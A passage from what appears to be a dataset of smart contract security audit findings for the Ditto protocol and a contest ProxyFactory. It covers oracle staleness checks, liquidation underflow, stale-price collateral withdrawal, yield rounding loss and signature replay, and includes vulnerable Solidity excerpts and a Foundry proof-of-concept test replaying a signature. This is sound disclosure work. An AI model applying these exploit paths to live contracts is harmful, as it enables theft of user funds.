TOKEN\\n~15min after the price got updated and cached, the TOKEN/ETH spot price decreases from $0.00075 \\text{ ETH}$ to $0.0005 \\text{ ETH}$. The CR improves -> CR = $1/(1400 * 0.0005) \\approx 142\\%$\\nSecondary liquidation is attempted to liquidate the short (primary short liquidation is not possible due to the 110% CR limit)\\nDuring the secondary liquidation call, `m.cRatio` is calculated based on the recent spot price (in step 4, due to cached price older than 15min) of $0.0005 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.0005 = 0.7 \\text{ ETH}$ -> CR = $ 1 / 0.7 \\approx 142\\%$\\nIn line 168, `ercDebtAtOraclePrice` is calculated based on the previously cached oracle price of $0.00075 \\text{ ETH}$ -> $1400 * 0.00075 = 1.05 \\text{ ETH}$\\nIn line 176, `m.short.collateral` is subtracted by `ercDebtAtOraclePrice` -> $1 - 1.05= -0.05 \\text{ ETH}$ -> arithmetic underflow error -> reverts!чConsider also using the minimum of the `m.short.collateral` and `ercDebtAtOraclePrice` values, as similarly done in lines 204-205.чThe secondary short liquidation mechanism reverts in certain market situations, forcing liquidators to wait for the CR to decrease further to be able to use the primary liquidation mechanism. This puts the overall collateral ratio and, thus the asset peg under pressure as liquidations can not be executed in a timely manner.ч```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n -Lack of essential stale check in oracleCircuitBreaker()чmediumчThe `LibOracle::oracleCircuitBreaker()` lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\" when compared to the `baseOracleCircuitBreaker()`.\\nWithout the check of the condition: \"block.timestamp > 2 hours + baseTimeStamp\", the `oracleCircuitBreaker()` will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nFor this reason, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale.\\n```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: \"block.timestamp > 2 hours + baseTimeStamp\"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n\\nThe oracleCircuitBreaker() lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\": https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L120-L123\\nWhereas the baseOracleCircuitBreaker() checks that condition: https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L73чAdd the condition: \"block.timestamp > 2 hours + baseTimeStamp\" in the `oracleCircuitBreaker()` to provide the stale check.\\n```\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n// Remove the line below\\n || baseChainlinkPrice <= 0;\\n// Add the line below\\n || baseChainlinkPrice <= 0 || block.timestamp > 2 hours // Add the line below\\n baseTimeStamp;\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n```\\nчThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: \"block.timestamp > 2 hours + baseTimeStamp\". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nConsequently, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale. The stale price will be consumed by core functions of the protocol, leading to harming the funds of the protocol and its users.ч```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: \"block.timestamp > 2 hours + baseTimeStamp\"\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n -LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulationчlowчAs per the documentation, LibOracle should only be returning the TWAP price from the WETH/USDC pool if the amount of WETH in the pool is >= 100e18. This is to ensure the fidelity of the data, which reduces the risk of price manipulation. However, this is not properly implemented for the case in which there was an invalid fetch of chainlink data. In this case, LibOracle simply returns the TWAP price without checking if there's enough liquidity in the pool. This can lead to a lack of data fidelity for the returned price.\\nIt's clear that reverting should be the correct action rather than returning the TWAP price without checking the liquidity, as even when there is a valid chainlink price, if the TWAP price is closer to the cached price (and there isn't enough liquidity), it will still revert.\\nLibOracle has a `baseOracleCircuitBreaker` function which handles whether to return the TWAP price or the chainlink price, when the asset is USD, and it is defined as follows:\\n```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n\\nWhen `invalidFetchData` is true, meaning that the chainlink price was not properly fetched, it will always return `twapPriceInv`. However, this lacks any checks as to whether there is at least 100 WETH in the Uniswap pool, which can result in a lack of data fidelity.чLibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation\\nBefore returning the TWAP price when `invalidFetchData` is true, first check whether the WETH/USDC pool has enough liquidity.чWhen the chainlink oracle is not functioning correctly, LibOracle will always return the TWAP price for the USD asset. However, this lacks any check as to whether there is enough liquidity in the Uniswap pool to guarantee data fidelity, meaning there is a higher likelihood of price manipulation.ч```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n -Decreasing and increasing a short's collateral potentially uses an outdated asset price to calculate the collateral ratioчmediumчThe `decreaseCollateral` and `increaseCollateral` functions in the `ShortRecordFacet` contract calculate the short's collateral ratio based on the cached asset price, which may be outdated, leading to a divergence between the actual collateral ratio (based on the asset spot price) and the calculated collateral ratio.\\nAccording to the conditions for updating the oracle, decreasing the short's collateral via the `ShortRecordFacet.decreaseCollateral` function should update the oracle price if the oracle price is older than 15 minutes.\\nHowever, in the current implementation of the `decreaseCollateral` function, the short's collateral ratio, `cRatio`, is calculated by calling the `getCollateralRatio` function in line 94:\\n```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n\\nThe called `getCollateralRatio` function uses the `LibOracle.getPrice` function to calculate the collateral ratio:\\n```\\nfunction getCollateralRatio(STypes.ShortRecord memory short, address asset)\\n internal\\n view\\n returns (uint256 cRatio)\\n{\\n return short.collateral.div(short.ercDebt.mul(LibOracle.getPrice(asset)));\\n}\\n```\\n\\nThe `LibOracle.getPrice` function returns the currently cached asset price, which potentially is older than 15 minutes.\\n```\\nfunction getPrice(address asset) internal view returns (uint80 oraclePrice) {\\n AppStorage storage s = appStorage();\\n return uint80(s.bids[asset][Constants.HEAD].ercAmount);\\n}\\n```\\n\\nConsequently, the calculated `cRatio` in line 94 of the `decreaseCollateral` function is based on the potentially outdated asset price, resulting in the collateral ratio being inaccurate and diverging from the actual collateral ratio based on the current asset spot price.\\nA short owner can exploit this by decreasing the short's collateral up to the point where the resulting collateral ratio is equal to the initial margin (i.e., 500%). As the collateral ratio, `cRatio`, is calculated in line 94 based on the outdated cached oracle price, the short owner can withdraw more collateral than the actual collateral ratio (based on the asset spot price) would allow.\\nSimilarly, the `increaseCollateral` function is affected as well.чConsider using the `LibOracle.getSavedOrSpotOraclePrice` function together with the `getCollateralRatioSpotPrice` function to calculate the collateral ratio based on the current asset price.чShort-position owners can withdraw more collateral than eligible, negatively affecting the overall asset's collateral ratio.ч```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n -Loss of ETH yield due to rounding error when updating the yield rate in the `updateYield` functionчlowчUpdating the vault's yield rate in the `LibVault.updateYield` function can lead to a loss of yield if the newly received ETH yield is small due to rounding errors.\\nThe `updateYield` function in the `LibVault` library is called by the permissionless `YieldFacet.updateYield` function and used to update the vault's yield rate from staking rewards earned by bridge contracts holding LSD.\\nThe newly accumulated yield, i.e., ETH received since the last update, is calculated by subtracting the current `zethTotalNew` from the previously stored yield `zethTotal`, as seen in line 75 of the `updateYield` function.\\ncontracts/libraries/LibVault.sol#L92\\n```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n\\nAfter determining the new `yield` (ETH), a fraction of the `yield` is assigned to the TAPP (treasury). Thereafter, the remaining `yield` is realized by adding it to the vault's `yield` rate (zethYieldRate), which is calculated by dividing the `yield` by the vault's short collateral, `zethCollateral`.\\n[!NOTE] Both the `yield` and `zethCollateral` values are in 18 decimal precision due to tracking ETH balances.\\nBy using the `divU80` function, the `zethYieldRate` is calculated as $zethYieldRate = \\frac{yield \\cdot 10^{18}}{zethCollateral}$\\nHowever, if the numerator is smaller than the denominator, i.e., the received ETH yield is very small and the vault's collateral large enough, the result of the division will be rounded down to 0, leading to a loss of the remaining yield.\\nAs anyone is able to call the public `YieldFacet.updateYield` function, this can be used to maliciously cause a loss of yield for all users if the newly received yield is small.\\nThe following test case demonstrates the described rounding error:\\nчConsider storing the rounding error and applying the correcting factor (error stored) the next time, or alternatively, prevent (skip) updating the yield if the resulting yield is 0.чLoss of LSD ETH yield for users of the same vault.ч```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n -Use of hardcoded price deviation in baseOracleCircuitBreaker()чlowчThe `LibOracle::baseOracleCircuitBreaker()` uses the hardcoded value of 50% price deviation, which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe `baseOracleCircuitBreaker()` is used for verifying the price reported by Chainlink. If the reported price is invalid or its price deviation when compared to the protocol's cached oracle price is more than 50%, the function will fall back to get Uniswap's TWAP price instead.\\nHowever, the `baseOracleCircuitBreaker()` uses a hardcoded value of 50% price deviation (0.5 ether), which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\n```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L77-L78\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L81чThe % price deviation should be a variable updatable by the protocol's DAO or admin in production.чThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe use of the hardcoded value of 50% price deviation (0.5 ether) might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nConsequently, the check for price deviation in the `baseOracleCircuitBreaker()` might not be effective enough for filtering out the stale price in production, directly affecting the quality of the oracle price that will be consumed by the core functions of the `Ditto` protocol (HIGH impact).ч```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n -Emitting incorrect event valueчlowчThe `LibShortRecord::burnNFT()` emits an incorrect event value.\\nThe `burnNFT()` emits an incorrect event value: `nft.owner`. Specifically, the `nft` variable will point to the storage object specified by the `tokenId`. However, the pointing storage object will be deleted before emitting the `Transfer` event.\\nSubsequently, the `ERC721::Transfer` event will be emitted with `nft.owner` == `address(0)`.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L366\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L371\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L374чEmit the `Transfer` event before the `delete` operations.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n// Add the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n// Remove the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\nчThe `ERC721::Transfer` is an important event. The incorrect event logs may cause off-chain services to malfunction.ч```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n -The same signature can be used in different `distribution` implementation causing that the caller who owns the signature, can distribute on unauthorized implementationsчhighчThe same signature can be used in different `distribute` implementations causing that the caller who owns the signature, to `distribute` on unauthorized implementations.\\nThe ProxyFactory::setContest() function helps to configure a `closeTime` to specific `organizer`, `contestId` and `implementation`.\\n```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n\\nThe caller who owns the signature, can distributes to winners using the deployProxyAndDistributeBySignature() function. The problem is that the hash in the code line (#159) does not consider the `implementation` parameter.\\n```\\nFile: ProxyFactory.sol\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n if (ECDSA.recover(digest, signature) != organizer) revert ProxyFactory__InvalidSignature();\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] == 0) revert ProxyFactory__ContestIsNotRegistered();\\n if (saltToCloseTime[salt] > block.timestamp) revert ProxyFactory__ContestIsNotClosed();\\n address proxy = _deployProxy(organizer, contestId, implementation);\\n _distribute(proxy, data);\\n return proxy;\\n }\\n```\\n\\nFor some reason, there could be a different `distribution` implementation to the same `contestId`. Then the caller who owns the signature can distribute even if the organizer does not authorize a signature to the new implementation.\\nI created a test where the caller who owns a signature can distribute to new `distribute implementation` using the same signature. Test steps:\\nOwner setContest using the implementation `address(distributor)`\\nOrganizer creates a signature.\\nCaller distributes prizes using the signature.\\nFor some reason there is a new distributor implementation. The Owner set the new distributor for the same `contestId`.\\nThe caller can distribute prizes using the same signature created in the step 2 in different distributor implementation.\\n```\\n// test/integration/ProxyFactoryTest.t.sol:ProxyFactoryTest\\n// $ forge test --match-test \"testSignatureCanBeUsedToNewImplementation\" -vvv\\n//\\n function testSignatureCanBeUsedToNewImplementation() public {\\n address organizer = TEST_SIGNER;\\n bytes32 contestId = keccak256(abi.encode(\"Jason\", \"001\"));\\n //\\n // 1. Owner setContest using address(distributor)\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(distributor));\\n vm.stopPrank();\\n bytes32 salt = keccak256(abi.encode(organizer, contestId, address(distributor)));\\n address proxyAddress = proxyFactory.getProxyAddress(salt, address(distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyAddress, 10000 ether);\\n vm.stopPrank();\\n assertEq(MockERC20(jpycv2Address).balanceOf(proxyAddress), 10000 ether);\\n // before\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 0 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 0 ether);\\n //\\n // 2. Organizer creates a signature\\n (bytes32 digest, bytes memory sendingData, bytes memory signature) = createSignatureByASigner(TEST_SIGNER_KEY);\\n assertEq(ECDSA.recover(digest, signature), TEST_SIGNER);\\n vm.warp(8.01 days);\\n //\\n // 3. Caller distributes prizes using the signature\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(distributor), signature, sendingData\\n );\\n // after\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 9500 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 500 ether);\\n //\\n // 4. For some reason there is a new distributor implementation.\\n // The Owner set the new distributor for the same contestId\\n Distributor new_distributor = new Distributor(address(proxyFactory), stadiumAddress);\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(new_distributor));\\n vm.stopPrank();\\n bytes32 newDistributorSalt = keccak256(abi.encode(organizer, contestId, address(new_distributor)));\\n address proxyNewDistributorAddress = proxyFactory.getProxyAddress(newDistributorSalt, address(new_distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyNewDistributorAddress, 10000 ether);\\n vm.stopPrank();\\n //\\n // 5. The caller can distribute prizes using the same signature in different distributor implementation\\n vm.warp(20 days);\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(new_distributor), signature, sendingData\\n );\\n }\\n```\\nчInclude the `distribution implementation` in the signature hash.\\n```\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n// Remove the line below\\n// Remove the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, 